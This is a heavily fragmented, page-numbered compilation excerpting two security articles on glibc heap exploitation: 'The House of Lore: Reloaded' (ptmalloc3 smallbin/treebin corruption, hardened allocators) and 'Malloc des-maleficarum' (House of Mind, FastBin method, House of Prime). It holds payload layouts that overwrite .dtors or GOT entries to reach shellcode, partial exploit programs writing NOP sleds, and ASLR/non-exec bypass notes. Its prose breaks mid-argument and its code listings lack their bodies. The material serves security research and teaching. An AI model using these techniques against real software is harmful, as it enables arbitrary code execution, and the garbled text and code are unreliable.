Delving into the internals of Ptmalloc3, without warm up, may seem violent,
but with a little help it's only a child's game.
Page
80
[2. The House Of Lore: Reloaded - blackngel]
In order to understand correctly the next sections, I present here the most
notable differences in the code with respect to Ptmalloc2.
The basic operation remains the same, in the end it's another common memory
allocator, and is also based on a version of Doug Lea allocator but adapted
to work on multiple threads.
struct malloc_chunk {
size_t prev_foot; /* Size of previous chunk (if free). */
size_t head; /* Size and inuse bits. */
struct malloc_chunk* fd; /* double links -- used only if free. */
struct malloc_chunk* bk;
};
As we see, the names of our well known "prev_size" and "size" fields have
been changed, but the meaning remains the same. Furthermore we knew three
usual bit control to which they added an extra one called "CINUSE_BIT"
which tells (in a redundant way) that the current chunk is assigned, as
opposed to that PINUSE_BIT that continues to report the allocation of the
previous chunk. Both bits have their corresponding checking and assign
macros.
The known "malloc_state" structure now stores the bins into two different
arrays for different uses:
mchunkptr smallbins[(NSMALLBINS+1)*2];
tbinptr treebins[NTREEBINS];
The first of them stores free chunks of memory below 256 bytes. Treebins[]
is responsible for long pieces and uses a special tree organization. Both
arrays are important in the respective techniques that will be discussed in
the following sections, providing there more details about its management
and corruption.
char* least_addr;
mchunkptr dv;
size_t magic;
Page
81
[2. The House Of Lore: Reloaded - blackngel]
For security purposes, some of the most important macros are following:
The last macro that you could be observe frequently is "RTCHECK(e)" which
is nothing more than a wrapper for "__builtin_expect(e, 1)", which in time
is more familiar from previous studies on malloc.
In the next section we see that every precaution that have been taken are
not sufficient to mitigate the attack presented here.
[ Norman Augustine ]
.---------------------------------.
---[ 4.1 ---[ SmallBin Corruption (Reverse) ]---
.---------------------------------.
To begin, we compile Ptmalloc3 and link the library statically with the
vulnerable application presented in 2.2.1. After using the same method to
exploit that application (by adjusting the evil_func( ) address of course,
which would be our dummy shellcode), we obtain a segment violation at
malloc.c, particularly in the last instruction of this piece of code:
Page
82
[2. The House Of Lore: Reloaded - blackngel]
The application breaks when, after having overwritten the "bk" pointer of
buff2, one requests a new buffer with the same size. Why does it happen?
#define unlink_first_small_chunk(M, B, P, I) {\
mchunkptr F = P->fd;\ [1]
.....
if (B == F)\
clear_smallmap(M, I);\
else if (RTCHECK(ok_address(M, F))) {\ [2]
B->fd = F;\ [3]
F->bk = B;\ [4]
}\
else {\
CORRUPTION_ERROR_ACTION(M);\
}\
}
Here, P is our overwritten chunk, and B is the bin belonging to that piece.
In [1], F takes the value of the "fd" pointer that we control (at the same
Page
83
[2. The House Of Lore: Reloaded - blackngel]
where the least_addr field is "the least address ever obtained from
MORECORE or MMAP"... then anything of higher value will pass this test.
We arrive to the classic steps of unlink, in [3] the "fd" pointer of the
bin points to our manipulated address. In [4] is where a segmentation
violation occurs, as it tries to write to (0x41414141)->bk the address of
the bin. As it falls outside the allocated address space, the fun ends.
The precautions are the same as in 2.2.1, F->bk must contain a writable
address, otherwise it will cause an access violation in [4].
If we accomplish all this conditions, the first chunk of the bin will be
unlinked and the following piece of code will be triggered.
mem = chunk2mem(p);
check_malloced_chunk(gm, mem, nb);
goto postaction;
.....
postaction:
POSTACTION(gm);
return mem;
Page
84
[2. The House Of Lore: Reloaded - blackngel]
[ P. Williams ]
.----------------------------------------.
---[ 4.2 ---[ LargeBin Method (TreeBin Corruption) ]---
.----------------------------------------.
In Ptmalloc3, large chunks (ie larger than 256 bytes), are stored in a tree
structure where each chunk has a pointer to its father, and retains two
pointers to its children (left and right) if having any. The code that
defines this structure is the following:
struct malloc_tree_chunk {
/* The first four fields must be compatible with malloc_chunk */
size_t prev_foot;
size_t head;
struct malloc_tree_chunk* fd;
struct malloc_tree_chunk* bk;
Page
85
[2. The House Of Lore: Reloaded - blackngel]
else {
nb = pad_request(bytes);
if (ms->treemap != 0 && (mem = tmalloc_large(ms, nb)) != 0) {
check_malloced_chunk(ms, mem, nb);
goto postaction;
}
}
If we tried to exploit this program in the same way as for Ptmalloc2, the
application would break first in the "unlink_large_chunk( )" macro, which
is very similar to "unlink_first_small_chunk( )". The most important lines
of this macro are these:
F = X->fd;\ [1]
R = X->bk;\ [2]
F->bk = R;\ [3]
R->fd = F;\ [4]
Thus we now know that both the "fd" and "bk" pointers of the overwritten
chunk must be pointing to writable memory addresses, otherwise this could
lead to an invalid memory access.
Page
86
[2. The House Of Lore: Reloaded - blackngel]
When you first enter this loop, "t" is being equal to the address of the
first chunk in the tree_bin[] corresponding to the size of the buffer
requested. The loop will continue while "t" has still some son and, finally
"v" (victim) will contain the smallest piece that can satisfy the request.
The trick for saving our problem is to exit the loop after the first
iteration. For this, we must make "leftmost_child(t)" returning a "0"
value.
[ Ralph Johnson ]
.-----------------------------.
---[ 4.3 ---[ Implement Security Checks ]---
.-----------------------------.
Ptmalloc3 could be safer than it seems at first, but for this, you should
have defined the FOOTERS constant at compile time (which is not the default
case).
Page
87
[2. The House Of Lore: Reloaded - blackngel]
#define get_mstate_for(p)\
((mstate)(((mchunkptr)((char*)(p) +\
(chunksize(p))))->prev_foot ^ mparams.magic))
#if FOOTERS
mstate fm = get_mstate_for(p);
#else /* FOOTERS */
mstate fm = (mstate)msp;
#endif /* FOOTERS */
if (!ok_magic(fm)) {
USAGE_ERROR_ACTION(fm, p);
return;
}
Moreover, one must be aware that the current flow could be broken even
before the USAGE_ERROR_ACTION( ) call if the reading of fm->magic causes a
segmentation fault due to wrong value obtained by get_mstate_for( ).
How to deal with this cookie and the probability analysis in order to
predict its value at runtime is an old issue, and we will not talk more
here about it. Though one could remember the PaX case, perhaps an
overwritten pointer can point beyond the "size" field of a chunk, and
through a future STRxxx( ) or MEMxxx( ) call, crush their data without have
altered "prev_foot". Skape made an excellent job in his "Reducing the
effective entropy of gs cookies" [4] for the Windows platform. It could
give you some fantastic ideas to apply. Who knows, it all depends on the
vulnerability and inherent requirements of the tested application.
Page
88
[2. The House Of Lore: Reloaded - blackngel]
Anyone who read the source code base has probably noticed that Ptmalloc3's
unlink...( ) macros omit the classic tests that implanted in glibc to check
the double linked list. We do not consider this because we know that a real
implementation would take it into account and should add this integrity
check. However, I can not perform a more detailed stud until someone
decides in a future that glibc will be based on Ptmalloc3.
victim = av->top;
size = chunksize(victim);
[ Danny Thorpe ]
.-----------------------------------.
---[ 4.3.1 ---[ Secure Heap Allocator (Utopian) ]---
.-----------------------------------.
Page
89
[2. The House Of Lore: Reloaded - blackngel]
headers, can not be located being adjacent to the data. Create a macro that
adds 8 bytes to the address of a header for direct access to data is very
simple, but has never been a safe option.
Then we came to the point in which it is essential the use cookies between
the fragments of memory assigned. It obviously has side effects. The most
efficient would be that this cookie (say 4 bytes) will be the last 4 bytes
of each allocated chunk, with the target of preserve the alignment, since
that put them between two chunks required a more complicated and possibly
slower management.
Besides this, we could also take ideas from "Electric Fence - Red-Zone
memory allocator" by Bruce Perens [5]. His protection ideas are:
if ( slot->mode != ALLOCATED ) {
if ( internalUse && slot->mode == INTERNAL_USE )
.....
else {
EF_Abort("free(%a): freeing free memory.",address);
slot = slotForUserAddress(address);
if ( !slot )
EF_Abort("free(%a): address not from malloc().", address);
The second, to take one example, use the pagination and its mechanism of
protection in a very clever way. Extracted directly from the manpage, we
read the core of his method:
"Each malloc allocation is placed on its own virtual memory page, with
the end of the buffer at the end of the page's memory, and the next
page is kept unallocated. As a result, accesses beyond the end of the
buffer cause a bus error immediately. When memory is freed, libgmalloc
deallocates its virtual memory, causing reads or writes to the freed
buffer cause a bus error."
Note: That's a really interesting idea but you should take into account the
fact that such a technic is not _that_ effective because if would sacrifice
a lot of memory. It would induce a PAGE_SIZE (4096 bytes is a common value,
or getpagesize( ) ;) allocation for a small chunk.
Page
90
[2. The House Of Lore: Reloaded - blackngel]
[ Richard Pattis ]
.------------.
Page
91
[2. The House Of Lore: Reloaded - blackngel]
.---------------.
| .text |
.---------------.
| .data |
.---------------.
...
.---------------.
| Chunks |
.---------------.
..
||
||
\/
/\
||
||
..
.--------------------.
| Memory Page | <- This Page is not writable
.--------------------.
| Chunk Information |
.--------------------.
| The Hash Table |
.--------------------.
| Memory Page |
.--------------------.
| The Stack | <- This Page is not writable
.--------------------.
2.- To get the entry in the Hash Table: shift *Result* 7 bits to the right.
3.- Go over the linked list till it have the correct chunk.
.-------------------------------------.
| The Hash Table |
. ................................... .
| Pointers to each Chunk Information | --> Chunk Information (Hash Next
.-------------------------------------. to the next Chunk Information)
1.- A fixed area is mapped below the Hash table for the Chunks Information.
Page
92
[2. The House Of Lore: Reloaded - blackngel]
3.- When a new Chunk Information is needed the first element in the free
list is used.
5.- If the map is empty It maps extra memory for it (and move the guard
page).
[ Chris Pirillo ]
.------------------.
---[ 4.3.3 ---[ OpenBSD malloc ]---
.------------------.
This implementation [11] [13] have the design goals: simple, unpredictable,
fast, less metadata space overhead, robust for example freeing of a bogus
pointer or a double free should be detected ...
About the Metadata: keep track of mmaped regions by storing their address
and size into a hash table, keep existing data structure for chunk
allocations, a free region cache with a fixed number of slots:
3.- If the number of pages cached gets too large, unmap some.
[ Mitchell Kapor ]
.-----------------------------.
---[ 5 ---[ Miscellany, ASLR and More ]---
.-----------------------------.
We already mentioned something about ASLR and Non Exec Heap in the Malloc
Page
93
[2. The House Of Lore: Reloaded - blackngel]
Des-Maleficarum paper. Now we do the same with the method we have studied.
For the purposes of this technique, I considered disabled the ASLR in all
examples of this article. If this protection was enabled in real life then
randomization only affects to the position of the final fake chunk in the
stack and our ability to predict a memory address close enough to a saved
return address that can be overwritten. This should not be an utterly
impossible task, and we consider that the bruteforce is always a
possibility that we will have a hand in most restrictive situations.
Obviously, the non-exec heap does not affect the techniques described in
this paper, as one might place a shellcode in any elsewhere, although we
warn that if the heap is not executable it is very likely that the stack
will not be either. Therefore one should use a ret2libc style attack or
return into mprotect( ) to avoid this protection.
This is an old theme, and each will know how to analyze problems underlying
the system attacked.
The preconditions are clear, this has been seen repeatedly throughout of
this article. The obvious difference between the PoC's that I presented
here and the applications you use every day (as well as email clients, or
web browsers), is that one can not predict in a first chance the current
state of the heap. And this is really a problem, because while this is not
in a fairly stable and predictable state, the chances of exploiting will be
minimal.
But very high-level hackers have already met once this class of problems,
and over time have been designing and developing a series of techniques
which allow reordering the heap so that both, the position of the allocated
chunks as the data contained within them, are parameters controlled by the
user. Among these techniques, we must appoint two best known:
- Heap Spray
- Heap Feng Shui
You can read something about them in the following paper presented at the
BlackHat 2007 [8]. In short we can say that the "Heap Spray" technique
simply fill in the heap as far as possible by requesting large amount of
memory placing there repetitions of nop sleds and the opportune shellcode,
then just simply find a predictable memory address for the "primitive
4-byte overwrite". A very clever idea in this technique is to make the nop
sled values equal to the selected address, so that it will be
self-referential.
... and finally tries to create the buffer to overflow in one of these
holes, knowing that this will always be adjacent to one of its buffers
containing information controlled by the exploiter.
We will not talk about it more here. Just say that although some of these
methodologies may seem time consuming and fatigue making, without them
Page
94
[2. The House Of Lore: Reloaded - blackngel]
[ Rich Cook ]
.---------------.
---[ 6 ---[ Conclusions ]---
.---------------.
In this article we have seen how The House of Lore hid inside of itself a
power much greater than we imagined. We also presented a fun example
showing that, despite not being vulnerable to all the techniques we knew so
far, it was still vulnerable to one that until now had only been described
theoretically.
Reviewing and analyzing in depth some of the security mechanisms that have
been implanted in this library, allowed to find that further studies will
be needed to discover new vulnerabilities and areas of code that can be
manipulated for personal fun and profit.
If you want a tip from mine on how to improve your hacking, here goes:
With this new article I hope I have changed the meaning of my words, and
shown that sometimes in hacking you make mistakes, but never stop to
investigate and repair your errors. Everything we do is for fun, and we
will do it as long as we exist on the land and cyberspace.
Page
95
[2. The House Of Lore: Reloaded - blackngel]
[ Galileo Galilei ]
.-------------------.
---[ 7 ---[ Acknowledgments ]---
.-------------------.
Indeed, the last details in the translation of this article are Dreg's
work, and this would never have been what it is without his invaluable
help.
For the rest, also thanks to all the people I met in dsrCON!, all very
friendly, outgoing and all with their particular point of madness. I am not
going to give more names, but, to all of them, thanks.
And remember...
Happy Hacking!
.--------------.
---[ 8 ---[ References ]---
.--------------.
Page
96
[2. The House Of Lore: Reloaded - blackngel]
http://www.rootedcon.es/
[10] dnmalloc
http://www.fort-knox.org/taxonomy/term/3
.----------------.
---[ 9 ---[ Wargame Code ]---
.----------------.
In this last section we attach the same program "agents.c" that we saw
above but adapted to network environment so that it can be feasible to use
in a servers exploitation wargame. At the same time the code is a bit more
elaborate and robust.
The code should be adapted according to the needs of the manager conducting
or developing the wargame (as well as the number of allowed incoming
connections or debugging information you want to give to the attacker if
the game becomes very difficult).
The attached archive includes a makefile which assumes that in the same
directory as the source is the compiled library ptmalloc2 (libmalloc.a) to
be linked with netagents.c. Each should adapt "malloc.c" to print the
information it deems necessary, but the basics would be the changes that
have been made throughout this article, which allows the attacker to know
from where they extract the chunks of memory requested.
How the attacker obtains the output of these changes? For simplicity,
"netagents.c" prevents calls to send( ) by closing the standard output
(stdout) and duplicating it with the recent obtained client socket
(dup(CustomerID)). We use the same trick as the shellcodes expected.
"netagents.c" also includes a new menu option, "Show Heap State", in order
to see the state of the memory chunks that are being allocated or released
during its execution, this allows you to see if the head of any free chunk
has been overwritten. After some legal moves, a normal output would be
this:
Page
97
[2. The House Of Lore: Reloaded - blackngel]
+--------------------------------+
| Allocated Chunk (0x8093004) | -> Agents[0]
+--------------------------------+
| SIZE = 0x00000019 |
+--------------------------------+
+--------------------------------+
| Allocated Chunk (0x809301c) | -> Agents[1]
+--------------------------------+
| SIZE = 0x00000019 |
+--------------------------------+
+--------------------------------+
| Allocated Chunk (0x8093034) | -> Agents[1]->name
+--------------------------------+
| SIZE = 0x00000029 |
+--------------------------------+
+--------------------------------+
| Free Chunk (0x8093058) | -> Agents[1]->lastname
+--------------------------------+
| PREV_SIZE = 0x00000000 |
+--------------------------------+
| SIZE = 0x00000089 |
+--------------------------------+
| FD = 0x08050168 |
+--------------------------------+
| BK = 0x08050168 |
+--------------------------------+
+--------------------------------+
| Allocated Chunk (0x80930e4) | -> Agents[1]->desc
+--------------------------------+
| SIZE = 0x00000108 |
+--------------------------------+
Following the example of the perl exploit presented in 2.2.2, one might
design an exploit in C with a child process continually receiving responses
from the server (menus and prompts), and the father answering these
questions with a pause, for example one second each answer (if you know
what to respond to work that program ...). The difficult task is to predict
the addresses on the stack, which in the last phase of the attack, the last
reserved chunk should match the frame created by "edit_lastname( )" since
that it is where we overwrite the saved return address and where the
program probably will break (it is obvious that ASLR enabled suppose a new
complexity to overcome).
What happens with failed attempts and segmentation failures? The program
captures SIGSEGV and informs the attacker that something bad has happened
and encourages him to connect again. The child process is the only that
becomes unstable and thus a new connection leaves everything clean for a
new attack.
The latest aid that one could provide to the attacker is to deliver the
source code, so this could be adapted to study the vulnerability in local,
and then carry his attack to the network environment.
Page
98
[3. Malloc des-maleficarum - blackngel]
|=-----------------------------------------------------------------------=|
|=----------------------=[ MALLOC DES-MALEFICARUM ]=---------------------=|
|=-----------------------------------------------------------------------=|
|=-----------------------------------------------------------------------=|
|=---------------=[ By blackngel ]=--------------=|
|=---------------=[ ]=--------------=|
|=---------------=[ <black *noSPAM* set-ezine.org> ]=--------------=|
|=---------------=[ <blackngel1 *noSPAM* gmail.org> ]=--------------=|
|=-----------------------------------------------------------------------=|
^^
*`* @@ *`* HACK THE WORLD
* *--* *
## <[email protected]>
|| <[email protected]>
* *
* * (C) Copyleft 2009 everybody
_* *_
---[ INDEX
1 - The History
2 - Introduction
4 - DES-Maleficarum...
7 - References
Page
99
[3. Malloc des-maleficarum - blackngel]
-----------------
---[ 1 ---[ THE HISTORY ]---
-----------------
On August 11, 2001, two papers were released in that same magazine and
they went to demonstrate a new advance in the vulnerabilities exploitation
world. MaXX wrote in his "Vudo malloc tricks" paper [1], the basic
implementation and algorithms of GNU C Library, Doug Lea's malloc(), and
he presented to the public various methods that be able to trigger
arbitrary code execution through heap overflows. At the same time, he
showed a real-life exploit of the "Sudo" application.
- unlink () method.
- frontlink () method.
... these methods were applicable until the year 2004, when the GLIBC
library was patched so those methods did not work.
But not everything was said with regard to this topic. On October 11 of
2005, Phantasmal Phantasmagoria was publishing on the "bugtraq" mailing
list an article which name provokes a deep mystery: "Malloc Maleficarum"
[4].
Phantasmal also was the author of the fantastic article "Exploiting the
Wilderness" [5], the chunk most afraid (at first) by the heap's lovers.
And certainly, it was the revolution that open again the minds when the
doors had been closed.
Page
100
[3. Malloc des-maleficarum - blackngel]
The only one fault of this article is that it was not showing any
proof of concept that demonstrated that each and every one of the
skills were possible.
[ Bertrand Russell ]
------------------
---[ 2 ---[ INTRODUCTION ]---
------------------
On the other hand, and very importantly, certain mistakes were trying to
be corrected that were an object of wrong interpretation in Malloc
Maleficarum. Mistakes that are today more easy to see thanks to the
enormous work that Phantasmal give us in his moment. He is an adept, a
"virtual adept" certainly...
Page
101
[3. Malloc des-maleficarum - blackngel]
NOTE: Except for The House of Prime, I had used a x86 Linux distro,
on a 2.6.24-23 kernel, with glibc version 2.7, which shows
that these techniques are still applicable today. Also, I have
check that some of them are availables in 2.8.90.
In this article you will see, through the witches, as there are still
some ways to go. And we can go together ...
[ Victor Hugo ]
------------------------
---[ 3 ---[ WELCOME TO THE PAST ]---
------------------------
"unlink ()" assumed that if two chunks were allocated in the heap, and
second was vulnerable to being overwritten through an overflow of first,
a third fake chunk could be created and so deceive "free ()" to proceed
to unlink this second chunk and tie with the first.
Page
102
[3. Malloc des-maleficarum - blackngel]
BK->fd = FD; \
}
Being P the second chunk, "P->fd" was changed to point to a memory area
capable of being overwritten (such as .dtors - 12). If "P->bk" then
pointed to the address of a Shellcode located at memory for an exploiter
(at ENV or perhaps the same first chunk), then this address would be
written in the 3rd step of unlink() code, in "FD->bk". Then:
If "P->fd", pointing to the next chunk (FD), is not modified, then the
"bk" pointer of FD should point to P. The same is true with the previous
chunk (BK)... if "P->bk" points to the previous chunk, then the forward
pointer at BK should point to P. In any other case, mean an error in the
double linked list and thus the second chunk (P) has been hacked.
[ Xavier Zubiri ]
------------------------
---[ 4 ---[ DES-MALEFICARUM... ]---
------------------------
Read carefully what now comes. I just hope that at the end of this paper,
the witches have completely disappeared.
Page
103
[3. Malloc des-maleficarum - blackngel]
-----------------------
---[ 4.1 ---[ THE HOUSE OF MIND ]---
-----------------------
We will study "The House of Mind" technique here, step by step, so that
those who start at these boundaries do not find too many problems along
the path... a path that already may be a little hard.
Neither show is worth a second view / opinion about how develop the
exploit, which in my case had a small behavioral variation (we will see it
below).
The understanding of this technique will become much easier if for some
accident I can demonstrate the ability of know to show the steps in
certain order, otherwise the mind go from one side to another, but... test
and play with the technique.
Two variants will be shown. Let's see here the first one:
NOTE 2: From here, we will have always in mind that "free()" is executed
on a second chunk that can be overflowed by another chunk that
has been allocated before.
void
public_fREe(Void_t* mem)
{
mstate ar_ptr;
mchunkptr p; /* chunk corresponding to mem */
...
p = mem2chunk(mem);
...
ar_ptr = arena_for_chunk(p);
...
_int_free(ar_ptr, mem);
}
Page
104
[3. Malloc des-maleficarum - blackngel]
p = (0x0804a000);
then:
(heap_info *) (0x08000000)
(0x08000000)->ar_ptr
So what you are looking at (0x08000000) the address of an "arena" (it will
be defined shortly). For now, we can say that at (0x08000000) there isn't
Page
105
[3. Malloc des-maleficarum - blackngel]
any address to point to any "arena", so the application soon will break
with a segmentation fault. (assuming an ET_EXEC with a base of 0x08048000)
It seems that our move end here. As our first chunk is just behind of the
second chunk at (0x0804a000) (but not much), this only allows us to
overwrite forward, preventing us write anything at (0x08000000).
If our first chunk was at (0x0804a000), we can overwrite ahead and put in
(0x08100000) an arbitrary address (usually the begining of the data of our
first chunk).
Think that we can change "ar_ptr" to any value. For example, we can do
that it points to an environment variable or another place. At this
address of memory, "_int_free()" expects to find an "arena" structure.
mstate ar_ptr;
struct malloc_state {
mutex_t mutex;
INTERNAL_SIZE_T max_fast; /* low 2 bits used as flags */
mfastbinptr fastbins[NFASTBINS];
mchunkptr top;
mchunkptr last_remainder;
mchunkptr bins[NBINS * 2];
unsigned int binmap[BINMAPSIZE];
...
INTERNAL_SIZE_T system_mem;
INTERNAL_SIZE_T max_system_mem;
};
...
static struct malloc_state main_arena;
Soon it will be helpful to know this. The goal of The House of Mind is to
ensure that the unsorted_chunks() code is reaached in "_int_free ()":
Page
106
[3. Malloc des-maleficarum - blackngel]
p = 0x081002a0 - 8;
...
bck = .dtors + 4 - 8
...
bck + 8 = DTORS_END = 0x08100298
Although the idea was good, K-special warned us that "unsorted_chunks ()",
in fact, did not return the value of "av->bins[0]," but it returns its
address "&".
Indeed, we see that "bin_at()" returns the address and not the value.
Therefore another way must be taken. Bearing this in mind, we can do
the next:
But we have jumped here without crossing the road full of spines. Our
friend Phantasmal also warned us that to run this piece of code, certain
conditions should be met. Now we will see each of them related with its
corresponding portion of code in the "_int_free()".
Page
107
[3. Malloc des-maleficarum - blackngel]
3) The bit IS_MMAPPED must not be set into the "size" field.
/* consolidate backward */
if (!prev_inuse(p)) { ...
Page
108
[3. Malloc des-maleficarum - blackngel]
The path seems long and tortuous, but it is not so much when we control
most situations. Let's go to see the vulnerable program of our friend
K-sPecial:
[-----]
/*
* K-sPecial's vulnerable program
*/
#include <stdio.h>
#include <stdlib.h>
}
malloc(1024); /* Request another chunk: (ptr2 != av->top) */
/* Incorrect input: 1048576 bytes */
fread (ptr, 1024 * 1024, 1, stdin);
[-----]
Note that the input allows NULL bytes without ending our string. This
makes our task more easy.
Page
109
[3. Malloc des-maleficarum - blackngel]
[-----]
0x0804a008
|
[Ax8][0h x 4][201h x 8][DTORS_END-12 x 246][(409h-Ax1028) x 721][409h] ...
| |
av->max_fast bins[0] size
|
.... [(&1st chunk + 8) x 256][NOPx2-JUMP 0x0c][40Dh][NOPx8][SHELLCODE]
| | |
0x08100000 prev_size (0x08100298) *mem (0x081002a0)
[-----]
1) The first call to free() overwrites the first 8 bytes with garbage,
then K-special prefer to skip this area and put into (0x08100000)
the address of the first chunk + 8(data area) + 8 (0x0804a010).
Here begins the fake arena structure.
5) Fill the nexts chunks until (0x08100000) with characters "A", while
retaining the "size" field (409h) of each chunk. Each one has
PREV_INUSE bit properly set.
7) The "prev_size" field of "p" must be "nop; nop; jmp 0x0c;". It will
jump to our Shellcode when DTORS_END will be executed at the end of
the application.
8) The "size" field of "p" must be greater than the value written in
"av->max_fast" and also have the NON_MAIN_ARENA bit activated
which was the trigger for this whole story in The House of Mind.
After understanding some very solid ideas, I was really surprised when a
simple execution of the K-sPecial's exploit produced the following output:
Page
110
[3. Malloc des-maleficarum - blackngel]
[-----]
[-----]
When the application stopped before the first free(), we can see our
buffer seems to be well formed: [A x 8] [0000] [102h x 8].
But once the first call to free () is completed, as we said, the first 8
bytes are trashed with memory addresses. Most surprising is that the
memory 0x0804a0010(av) + 4, is set to zero (0x00000000).
This position should be "av->max_fast", which being zero and not having
NONCONTIGUOUS_BIT bit enabled, dumps the error above. This seems happens
with the following instructions:
Page
111
[3. Malloc des-maleficarum - blackngel]
(void *)mutex_unlock(&ar_ptr->mutex);
So we can save 8 bytes of garbage in the exploit and the hardcoded value
of "mutex", and leave to free () to do the rest for us.
[-----]
[-----]
It seems that the second chunk "p", again suffer the wrath of free().
PREV_SIZE field is OK, SIZE field is OK, but the 8 NOPS are trashed with
two memory addresses and 8 bytes NULL.
p->bk = bck;
p->fd = fwd;
It is clear that both pointers are overwritten with the address of the
previous and next chunks to our overflowed chunk "p".
[-----]
/*
* K-sPecial exploit modified by blackngel
*/
#include <stdio.h>
Page
112
[3. Malloc des-maleficarum - blackngel]
int i, j;
fwrite("\x90\x90\x90\x90\x90\x90\x90\x90" \
"\x90\x90\x90\x90\x90\x90\x90\x90", 16, 1, stdout); /* NOPS */
return 0;
}
[-----]
We have succeeded! Up to this point, you could think that the first of
conditions for The House of Mind (a piece of memory allocated in an
address like 0x08100000) seems impossible from a practical point of view.
Page
113
[3. Malloc des-maleficarum - blackngel]
Is that true?
[-----]
[...]
cp = arg;
[...]
p = xmalloc (sizeof (struct an_entry));
cp = xmalloc (strlen (arg) + 2); strcpy (cp, arg); p->next = entries;
p->entry = cp;
entries = p;
}
[-----]
How vl4d1m1r said, the heap layout will looked something like this:
[an_entry][buffer][an_entry][buffer]...[Wilderness]
You can find this theory much better explained in the article "The Art of
Exploitation: Come on back to exploit [10] published by vl4d1m1r of
Ac1dB1tch3z in Phrack 64.
The old exploit used the technique unlink () to accomplish its purpose.
This was for the glibc versions where this feature was not yet patched.
I'm not saying that The House of Mind is applicable to this vulnerability,
but rather that meets certain conditions. It would be an exercise for the
more advanced reader.
[ Lotfi Zadeh ]
Page
114
[3. Malloc des-maleficarum - blackngel]
--------------------
---[ 4.1.1 ---[ FASTBIN METHOD ]---
--------------------
[-----]
set_fastchunks(av);
fb = &(av->fastbins[fastbin_index(size)]);
if (__builtin_expect (*fb == p, 0))
{
errstr = "double free or corruption (fasttop)";
goto errout;
}
printf("\nbDebug: p = 0x%x - fb = 0x%x\n", p, fb);
p->fd = *fb;
*fb = p;
}
[-----]
If we hack the "size" field of the overflowed chunk passed to free() and
sets it to 8, "fastbin_index()" returned the following value:
(8 >> 3) - 2 = -1
Then:
&(av->fastbins[-1])
Page
115
[3. Malloc des-maleficarum - blackngel]
In "*fb = p", the content of this address will be overwritten with the
address of the liberated chunk "p", which as before should must contain
a "JMP" sentence to reach the Shellcode.
Seen this, if you want to use ".dtors", you should make that "ar_ptr"
points to ".dtors" address in "public_free()", so that this address will
be the fakearena and "av->max_fast (av + 4)" will be equal to ".dtors +
4". Then it will be overwritten with the address of "p".
But to achieve this you have to go through a hard path. Let's see the
conditions that we must meet:
This is relatively the easiest, because we said that the size will be
equal to "8" and "av->max_fast" will be the address of a destructor.
It should be clear that in this case "DTORS_END" is not valid because
it is always "\x00\x00\x00\x00" and never will be greater than "size".
It seems then that the most effective is to make use of the Global
Offset Table (GOT).
[-----]
Page
116
[3. Malloc des-maleficarum - blackngel]
[-----]
Here is ended the theory presented in the two mentioned papers. But
unfortunately there is something that they forgot... at least it is
something that quite surprised me from K-sPecial.
We learned about the previous attack, that "av->mutex", which is the first
item in an "arena" structure, should be equal to 0. K-special, warned us
that otherwise, "free()" would remain in an infinite loop...
You can find "0x00000000" four bytes behind of .dtors, but overwrite
"0xffffffff" has no effect.
I do not think that you can found 0x00000000 values between each item
within the GOT.
Solutions?
The main goal would be to use the stack, as mentioned earlier. But the
difference is that we should have a buffer overflow before that allow
overwrite EBP with 0 bytes, so we have:
----------------
Page
117
[3. Malloc des-maleficarum - blackngel]
FINAL SOLUTION
----------------
But because we control the entire arena "av", can we afford make a new
analysis of "fastbin_index()" for a size argument of 16 bytes:
(16 >> 3) - 2 = 0
If our vulnerable code is into fvuln() function, EBP and EIP will be
pushed in the stack at the prologue, and what there is behind EBP? If no
user data then usually you can find a "0x00000000" value. If we use
"av->fastbins[0]" and not "av->maxfast", we have the following:
And we can control the "size" field of the next chunk to be greater than
"8" and less than "av->system_mem". If you look at the code above you will
note that this field is calculated from the offset of "p", therefore,
this field is virtually in "p + 0x15", which is an offset of 21 bytes.
But this value will be in the middle of our NOPS filler and we should make
a small change in the "JMP" sentence in order to jump farthest. Something
like 16 bytes will be sufficient.
[-----]
int fvuln()
{
// Make something stupid here.
}
Page
118
[3. Malloc des-maleficarum - blackngel]
fvuln();
...
[-----]
[-----]
/*
* FastBin Method - exploit
*/
#include <stdio.h>
int i, j;
fwrite("\x90\x90\x90\x90" \
"\x90\x90\x90\x90" \
"\x90\x90\x90\x90" \
"\x09\x00\x00\x00" \ /* nextchunk->size */
"\x90\x90\x90\x90", 20, 1, stdout);
return(0);
}
[-----]
Page
119
[3. Malloc des-maleficarum - blackngel]
[-----]
/* STACK DUMP */
(gdb) x/4x 0xbffff434 // av->max_fast // av->fastbins[0]
0xbffff434: 0x00000000 0xbffff518 0x0804ce52 0x080483ec
Page
120
[3. Malloc des-maleficarum - blackngel]
[-----]
The advantage of this method is that it does not touch at any time the EBP
register, and thus we can skip some protection to BoF.
It is also noteworthy that the two methods presented here, in The House of
Mind, are still applicable in the most recent versions of glibc, I have
checked it with the latest version of GLIBC 2.8.90.
This time we have arrived, walking with lead foot and after a long
journey, to The House of Mind.
[ XXX ]
-----------------------
---[ 4.1.2 ---[ av->top NIGHTMARE ]---
-----------------------
Once I had completed the study of The House of Mind, tracking down a
little more code in search of other possible attack vectors, I found
something like this at _int_free ():
[-----]
/*
If the chunk borders the current high end of memory,
consolidate into top
*/
else {
size += nextsize;
set_head(p, size | PREV_INUSE);
av->top = p;
check_chunk(av, p);
}
Page
121
[3. Malloc des-maleficarum - blackngel]
[-----]
At this point, EIP would be overwritten with the address of our chunk "p"
overflowed. Then one arbitrary code execution could be triggered.
if (nextchunk != av->top) {
...
}
This only happens when the chunk "p" that will be free()ed, is contiguous
to the highest chunk, the Wilderness.
At some point you might think that you control the value of av->top, but
remember that once you place av in the stack, the control is passed to
random values in memory, and the current value of EIP never will be equal
to "nextchunk" unless it is possible one classic stack-overflow, then I
don't know that you do reading this article...
That I just want to prove, that for better or for worse, all possible ways
should be examined carefully.
[ K. Jaspers ]
------------------------
---[ 4.2 ---[ THE HOUSE OF PRIME ]---
------------------------
Thus seen to date, I do not want to dwell too much. The House of Prime is,
unquestionably, one of the most elaborated techniques in Malloc
Maleficarum . The result of a virtual adept.
To perform this technique will be needed tow calls to free() over two
chunks of memory that should be under designer's control, and one future
call to "malloc ()".
The goal here, it sould be clear, it is not overwrite any memory address
(even if it's necessary to completion of the technique), but make that
one call to "malloc()" returns an arbitrary memory address. Then, if we
can control this area doing that it will fall in the stack, we could take
total control of application.
Page
122
